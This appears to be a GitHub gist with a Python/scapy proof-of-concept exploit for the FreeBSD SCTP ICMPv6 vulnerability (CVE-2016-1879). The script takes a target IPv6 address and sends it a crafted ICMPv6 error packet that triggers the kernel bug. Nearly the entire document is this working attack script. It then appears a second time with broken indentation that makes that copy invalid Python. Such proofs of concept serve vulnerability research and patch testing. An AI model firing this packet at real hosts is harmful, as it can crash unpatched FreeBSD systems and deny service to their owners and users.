takeshixx/byebyebsd.py

## byebyebsd.py
# FreeBSD SCTP ICMPv6 error message vulnerability (FreeBSD-SA-16:01.sctp / CVE-2016-1879) PoC
# https://www.freebsd.org/security/advisories/FreeBSD-SA-16:01.sctp.asc
# https://github.com/freebsd/freebsd/commit/51f55053b6565d2fe9b61f63460dddc23284a103
import sys
from scapy.all import *

if len(sys.argv) is not 3:
    print('{} target_ip interface'.format(sys.argv[0]))
    exit(1)

IP6_DST = sys.argv[1]
IF_SRC = sys.argv[2]

# Works with ICMPv6DestUnreach(), ICMPv6ParamProblem() and ICMPv6PacketTooBig()
packet = Ether()/IPv6(dst=IP6_DST)/ICMPv6PacketTooBig()/IPv6(nh=132, dst=IP6_DST)
sendp(packet, iface=IF_SRC)
	# FreeBSD SCTP ICMPv6 error message vulnerability (FreeBSD-SA-16:01.sctp / CVE-2016-1879) PoC
	# https://www.freebsd.org/security/advisories/FreeBSD-SA-16:01.sctp.asc
	# https://github.com/freebsd/freebsd/commit/51f55053b6565d2fe9b61f63460dddc23284a103
	import sys
	from scapy.all import *

	if len(sys.argv) is not 3:
	print('{} target_ip interface'.format(sys.argv[0]))
	exit(1)

	IP6_DST = sys.argv[1]
	IF_SRC = sys.argv[2]

	# Works with ICMPv6DestUnreach(), ICMPv6ParamProblem() and ICMPv6PacketTooBig()
	packet = Ether()/IPv6(dst=IP6_DST)/ICMPv6PacketTooBig()/IPv6(nh=132, dst=IP6_DST)
	sendp(packet, iface=IF_SRC)